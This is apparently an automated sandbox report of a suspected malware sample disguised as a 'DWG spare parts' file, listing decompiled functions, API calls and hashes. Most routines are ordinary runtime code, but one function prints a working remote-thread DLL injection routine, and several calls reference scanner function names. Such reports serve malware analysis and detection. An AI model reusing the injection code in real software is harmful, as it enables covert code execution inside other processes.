                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 7b27f5cfff0af013fa1456ab116b9e32cf10b7861c5a89aa25d1204a9044fe58
                                                                • Instruction ID: 1541649f864b222f47507093930f48486787a1a48396829d838e01dbc318b14e
                                                                • Opcode Fuzzy Hash: 7b27f5cfff0af013fa1456ab116b9e32cf10b7861c5a89aa25d1204a9044fe58
                                                                • Instruction Fuzzy Hash: 8AF08270614704BFFB115F75CC5182BBBBDF74DB1078248B1E801D2A50E5395C20C969
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02515AA8(void* __eax) {
                                                                				char _v272;
                                                                				intOrPtr _t14;
                                                                				void* _t16;
                                                                				intOrPtr _t18;
                                                                				CHAR* _t19;
                                                                
                                                                				_t16 = __eax;
                                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                					_t3 = _t16 + 4; // 0x2510000
                                                                					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                					_t14 = E02515D0C(_t19); // executed
                                                                					_t18 = _t14;
                                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                					if(_t18 == 0) {
                                                                						_t5 = _t16 + 4; // 0x2510000
                                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                					}
                                                                				}
                                                                				_t7 = _t16 + 0x10; // 0x2510000
                                                                				return  *_t7;
                                                                			}









                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 02515AC6
                                                                  • Part of subcall function 02515D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02510000,0252D7B4), ref: 02515D28
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D46
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D64
                                                                  • Part of subcall function 02515D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02515D82
                                                                  • Part of subcall function 02515D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02515DCB
                                                                  • Part of subcall function 02515D0C: RegQueryValueExA.ADVAPI32(?,02515F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001), ref: 02515DE9
                                                                  • Part of subcall function 02515D0C: RegCloseKey.ADVAPI32(?,02515E18,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02515E0B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                • String ID:
                                                                • API String ID: 2796650324-0
                                                                • Opcode ID: dd43b2051222977f98b27821c9ce266dd37c7b0da5ec07d15f6394917f749a7b
                                                                • Instruction ID: 3583e229663038dfd794d01d15c64a61eb88ceee92748a97e20ff7529a0e48ed
                                                                • Opcode Fuzzy Hash: dd43b2051222977f98b27821c9ce266dd37c7b0da5ec07d15f6394917f749a7b
                                                                • Instruction Fuzzy Hash: A2E06D71A003148BDB10DE68C8C0B4777D8BB88751F4046A1ED68CF286E3B0DA548BD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E02518094(void* __eax, long __ecx, void* __edx) {
                                                                				long _v16;
                                                                				int _t4;
                                                                
                                                                				_push(__ecx);
                                                                				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                                				if(_t4 == 0) {
                                                                					_v16 = 0xffffffff;
                                                                				}
                                                                				return _v16;
                                                                			}






                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 025180A8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 9c3475107fb88e5b2fa032e5a56ae23c9ad0c42c3cf7dd9a7fd297a6f3fe9822
                                                                • Instruction ID: c0108f66de257adb0cd6c8b75f17f0fff188e95b4409fb10f26979ac7c329766
                                                                • Opcode Fuzzy Hash: 9c3475107fb88e5b2fa032e5a56ae23c9ad0c42c3cf7dd9a7fd297a6f3fe9822
                                                                • Instruction Fuzzy Hash: 11D05B763081107BF224955A9D84EBB5BDCDBC5771F11073EB558C7180D7208C05C775
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02518110(void* __eax) {
                                                                				signed char _t5;
                                                                
                                                                				_t5 = GetFileAttributesA(E02514D64(__eax)); // executed
                                                                				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
                                                                					return 0;
                                                                				} else {
                                                                					return 1;
                                                                				}
                                                                			}





                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02518134(void* __eax) {
                                                                				signed char _t5;
                                                                
                                                                				_t5 = GetFileAttributesA(E02514D64(__eax)); // executed
                                                                				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                                					return 0;
                                                                				} else {
                                                                					return 1;
                                                                				}
                                                                			}





                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0252752B,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 0251813F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0252B0CC(int __eax) {
                                                                				int _t3;
                                                                
                                                                				_t3 = timeSetEvent(__eax, 0, E0252B0C0, 0, 1); // executed
                                                                				 *0x256da78 = _t3;
                                                                				return _t3;
                                                                			}





                                                                APIs
                                                                • timeSetEvent.WINMM(00002710,00000000,0252B0C0,00000000,00000001), ref: 0252B0DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventtime
                                                                • String ID:
                                                                • API String ID: 2982266575-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 50%
                                                                			E0251CB0B() {
                                                                				int _t4;
                                                                				intOrPtr _t7;
                                                                				void* _t8;
                                                                
                                                                				_pop(_t7);
                                                                				 *[fs:eax] = _t7;
                                                                				_push(E0251CB29);
                                                                				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
                                                                				return _t4;
                                                                			}







                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0251CB29), ref: 0251CB1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251CB27() {
                                                                				int _t3;
                                                                				void* _t4;
                                                                
                                                                				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
                                                                				return _t3;
                                                                			}






                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0251CB29), ref: 0251CB1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E025115FC(signed int __eax) {
                                                                				void* _t4;
                                                                				intOrPtr _t7;
                                                                				signed int _t8;
                                                                				void* _t10;
                                                                				void** _t15;
                                                                				void* _t17;
                                                                
                                                                				_t8 = __eax;
                                                                				E02511590(__eax);
                                                                				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
                                                                				if(_t4 == 0) {
                                                                					 *0x256a718 = 0;
                                                                					return 0;
                                                                				} else {
                                                                					_t15 =  *0x256a704; // 0x2920000
                                                                					_t10 = _t4;
                                                                					 *_t10 = 0x256a700;
                                                                					 *0x256a704 = _t4;
                                                                					 *(_t10 + 4) = _t15;
                                                                					 *_t15 = _t4;
                                                                					_t17 = _t4 + 0x140000;
                                                                					 *((intOrPtr*)(_t17 - 4)) = 2;
                                                                					 *0x256a718 = 0x13fff0 - _t8;
                                                                					_t7 = _t17 - _t8;
                                                                					 *0x256a714 = _t7;
                                                                					 *(_t7 - 4) = _t8 | 0x00000002;
                                                                					return _t7;
                                                                				}
                                                                			}










                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02511A33), ref: 02511612
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E025116B2(intOrPtr __eax) {
                                                                				void* _t6;
                                                                				void** _t9;
                                                                				void* _t11;
                                                                				void* _t15;
                                                                				long _t20;
                                                                				intOrPtr _t24;
                                                                
                                                                				_t24 = __eax;
                                                                				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
                                                                				_t11 = _t6;
                                                                				if(_t11 != 0) {
                                                                					_t15 = _t11;
                                                                					 *((intOrPtr*)(_t15 + 8)) = _t24;
                                                                					 *(_t15 + 0xc) = _t20 | 0x00000004;
                                                                					E02511674();
                                                                					_t9 =  *0x256c7a8; // 0x7ef90000
                                                                					 *_t15 = 0x256c7a4;
                                                                					 *0x256c7a8 = _t11;
                                                                					 *(_t15 + 4) = _t9;
                                                                					 *_t9 = _t11;
                                                                					 *0x256c7a0 = 0;
                                                                					_t11 = _t11 + 0x10;
                                                                				}
                                                                				return _t11;
                                                                			}










                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 025116D4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02511716(void* __eax) {
                                                                				void* _t5;
                                                                				signed int _t6;
                                                                				signed int _t7;
                                                                				void* _t10;
                                                                				void* _t13;
                                                                				void _t16;
                                                                
                                                                				_t10 = __eax - 0x10;
                                                                				E02511674();
                                                                				_t5 = _t10;
                                                                				_t16 =  *_t5;
                                                                				_t13 =  *(_t5 + 4);
                                                                				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
                                                                				if(_t6 == 0) {
                                                                					_t7 = _t6 | 0xffffffff;
                                                                				} else {
                                                                					 *_t13 = _t16;
                                                                					 *(_t16 + 4) = _t13;
                                                                					_t7 = 0;
                                                                				}
                                                                				 *0x256c7a0 = 0;
                                                                				return _t7;
                                                                			}










                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02512014), ref: 02511734
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 83%
                                                                			E02515B48(CHAR* __eax, int __edx) {
                                                                				CHAR* _v8;
                                                                				int _v12;
                                                                				CHAR* _v16;
                                                                				void* _v20;
                                                                				struct _WIN32_FIND_DATAA _v338;
                                                                				char _v599;
                                                                				void* _t102;
                                                                				intOrPtr* _t103;
                                                                				CHAR* _t106;
                                                                				CHAR* _t108;
                                                                				char* _t109;
                                                                				void* _t110;
                                                                
                                                                				_v12 = __edx;
                                                                				_v8 = __eax;
                                                                				_v16 = _v8;
                                                                				_v20 = GetModuleHandleA("kernel32.dll");
                                                                				if(_v20 == 0) {
                                                                					L4:
                                                                					if( *_v8 != 0x5c) {
                                                                						_t108 =  &(_v8[2]);
                                                                						goto L10;
                                                                					} else {
                                                                						if(_v8[1] == 0x5c) {
                                                                							_t109 = E02515B28( &(_v8[2]));
                                                                							if( *_t109 != 0) {
                                                                								_t17 = _t109 + 1; // 0x1
                                                                								_t108 = E02515B28(_t17);
                                                                								if( *_t108 != 0) {
                                                                									L10:
                                                                									_t102 = _t108 - _v8;
                                                                									lstrcpynA( &_v599, _v8, _t102 + 1);
                                                                									while( *_t108 != 0) {
                                                                										_t106 = E02515B28( &(_t108[1]));
                                                                										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                                                                											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
                                                                											_v20 = FindFirstFileA( &_v599,  &_v338);
                                                                											if(_v20 != 0xffffffff) {
                                                                												FindClose(_v20);
                                                                												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                                                                													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                                                                													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
                                                                													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                                                                													_t108 = _t106;
                                                                													continue;
                                                                												}
                                                                											}
                                                                										}
                                                                										goto L17;
                                                                									}
                                                                									lstrcpynA(_v8,  &_v599, _v12);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				} else {
                                                                					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
                                                                					if(_t103 == 0) {
                                                                						goto L4;
                                                                					} else {
                                                                						_push(0x105);
                                                                						_push( &_v599);
                                                                						_push(_v8);
                                                                						if( *_t103() == 0) {
                                                                							goto L4;
                                                                						} else {
                                                                							lstrcpynA(_v8,  &_v599, _v12);
                                                                						}
                                                                					}
                                                                				}
                                                                				L17:
                                                                				return _v16;
                                                                			}

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515B65
                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02515B7C
                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02515BAC
                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C10
                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C46
                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C59
                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C6B
                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C77
                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000), ref: 02515CAB
                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8), ref: 02515CB7
                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02515CD9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                • API String ID: 3245196872-1565342463
                                                                • Opcode ID: 64772cc9ebd694477b00d19f3aac50c0e09a2706d18eb1cbda9c90cea9b894df
                                                                • Instruction ID: c6b77dae911c6c38ad0231a1b38a2f2768b13bb235d76ce6331ee48e56c99b96
                                                                • Opcode Fuzzy Hash: 64772cc9ebd694477b00d19f3aac50c0e09a2706d18eb1cbda9c90cea9b894df
                                                                • Instruction Fuzzy Hash: 8F416CB1D00619AFEB10DEE8CC88ADEB7ADBB88344F5445E5A559E7200E774DE808F58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02523E60(void* __eax, CHAR* __edx) {
                                                                				char _v278;
                                                                				_Unknown_base(*)()* _v282;
                                                                				_Unknown_base(*)()* _v286;
                                                                				intOrPtr _v290;
                                                                				short _v292;
                                                                				intOrPtr _v296;
                                                                				char _v297;
                                                                				intOrPtr _v301;
                                                                				short _v303;
                                                                				intOrPtr _v307;
                                                                				void _v308;
                                                                				long _v312;
                                                                				long _v316;
                                                                				void* _t32;
                                                                				intOrPtr _t34;
                                                                				struct HINSTANCE__* _t39;
                                                                				void* _t40;
                                                                				_Unknown_base(*)()* _t41;
                                                                				CHAR** _t42;
                                                                
                                                                				 *_t42 = __edx;
                                                                				_t40 = __eax;
                                                                				_t34 = 0;
                                                                				_t41 = VirtualAllocEx(__eax, 0, 0x123, 0x1000, 0x40);
                                                                				if(_t41 != 0) {
                                                                					_t20 = _t41;
                                                                					_v308 = 0x68;
                                                                					_t2 = _t20 + 0x1e; // 0x1e
                                                                					_v307 = _t2;
                                                                					_v303 = 0x15ff;
                                                                					_t5 = _t20 + 0x16; // 0x16
                                                                					_v301 = _t5;
                                                                					_v297 = 0x68;
                                                                					_v296 = 0;
                                                                					_v292 = 0x15ff;
                                                                					_v290 = _t41 + 0x1a;
                                                                					_t39 = GetModuleHandleA("kernel32.dll");
                                                                					_v286 = GetProcAddress(_t39, "LoadLibraryA");
                                                                					_v282 = GetProcAddress(_t39, "ExitThread");
                                                                					lstrcpyA( &_v278,  *_t42);
                                                                					WriteProcessMemory(_t40, _t41,  &_v308, 0x123,  &_v316);
                                                                					_t32 = CreateRemoteThread(_t40, 0, 0, _t41, 0, 0,  &_v312);
                                                                					if(_t32 != 0) {
                                                                						CloseHandle(_t32);
                                                                						_t34 = 1;
                                                                					}
                                                                				}
                                                                				return _t34;
                                                                			}

                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?,?,02524314,?,00000000,025243E7,?,0255D33C,?), ref: 02523E80
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?,?,02524314,?,00000000,025243E7,?,0255D33C), ref: 02523EC9
                                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 02523ED6
                                                                • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 02523EE5
                                                                • lstrcpyA.KERNEL32(?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?), ref: 02523EF7
                                                                • WriteProcessMemory.KERNEL32(0A74C085,00000000,?,00000123,?,?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000), ref: 02523F0D
                                                                • CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 02523F21
                                                                • CloseHandle.KERNEL32(00000000,0A74C085,00000000,00000000,00000000,00000000,00000000,?,0A74C085,00000000,?,00000123,?,?,00000000,00000000), ref: 02523F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleProc$AllocCloseCreateMemoryModuleProcessRemoteThreadVirtualWritelstrcpy
                                                                • String ID: ExitThread$LoadLibraryA$h$h$kernel32.dll
                                                                • API String ID: 3622847927-1073290800
                                                                • Opcode ID: 45e46d235635c0eff6b929831ab98c1bae92f88b6efa45edb43cc19437426771
                                                                • Instruction ID: c9e04813ffaa7fe070d65ca83b16fb8b9798424cf43cb6cc9ca610b87a1a444f
                                                                • Opcode Fuzzy Hash: 45e46d235635c0eff6b929831ab98c1bae92f88b6efa45edb43cc19437426771
                                                                • Instruction Fuzzy Hash: 3921AC712483157AE310DA55CC41FABBAEDEFC6700F408469F584AA2C0E67896088BAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02515E18() {
                                                                				void* _t32;
                                                                				CHAR* _t56;
                                                                				CHAR* _t57;
                                                                				struct HINSTANCE__* _t64;
                                                                				void* _t66;
                                                                
                                                                				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
                                                                				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
                                                                				_t64 = 0;
                                                                				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
                                                                					L14:
                                                                					return _t64;
                                                                				} else {
                                                                					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
                                                                					L5:
                                                                					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
                                                                						_t56 = _t56 - 1;
                                                                						goto L5;
                                                                					}
                                                                					_t32 = _t66 - 0x11d;
                                                                					if(_t56 != _t32) {
                                                                						_t57 =  &(_t56[1]);
                                                                						if( *(_t66 - 0x12) != 0) {
                                                                							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
                                                                							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                						}
                                                                						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
                                                                							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                							if(_t64 == 0) {
                                                                								 *((char*)(_t66 - 0xb)) = 0;
                                                                								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                							}
                                                                						}
                                                                					}
                                                                					goto L14;
                                                                				}
                                                                			}

                                                                APIs
                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02515E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02515E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02515E3B
